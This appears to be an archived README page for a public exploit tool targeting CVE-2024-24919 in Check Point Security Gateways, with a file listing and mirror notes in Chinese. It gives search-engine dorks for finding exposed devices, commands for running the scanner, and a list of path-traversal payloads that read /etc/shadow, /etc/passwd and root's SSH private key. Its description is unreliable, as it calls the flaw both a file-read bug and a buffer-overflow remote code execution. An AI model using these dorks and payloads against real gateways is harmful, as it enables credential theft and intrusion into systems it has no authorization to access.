关联漏洞
Description
CVE-2024-24919 exploit
介绍
## **Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)**
### **Overview**
This repository contains a tool for exploiting the **CVE-2024-24919** vulnerability in Check Point Security Gateways. The tool is a multi-scanner that can identify vulnerable devices and a single-target exploit that can take full control of the affected device.
**CVE-2024-24919** is a high-severity information disclosure vulnerability that allows an attacker to remotely read arbitrary files on a Check Point Security Gateway. This vulnerability can be exploited to steal sensitive information, such as passwords and configuration files.
**Disclaimer:**
This tool is provided for educational purposes only. It should not be used to attack vulnerable systems without the explicit consent of the owner. The authors of this tool are not responsible for any damages that may result from its use.
### **How it works**
The exploit works by sending a specially crafted HTTP request to the vulnerable device. The request triggers a buffer overflow in the device's firmware, which allows the attacker to execute arbitrary code. The exploit can then be used to take full control of the device.
### **Requirements**
* Python 3
* colorama
* requests
### **Installation**
```
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
```
### **Usage**
You can scan singel target or multi!
```
python cve-2024-24919.py
```
### **Dorks **
```
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"
```
### ** Tool ScreenShot **
$ Tool paths :
```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
文件快照
[4.0K] /data/pocs/6238d21bd996d2567845f81d1b34e490a4791098
├── [4.2K] CVE-2024-24919.py
├── [2.7K] README.md
└── [ 18] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。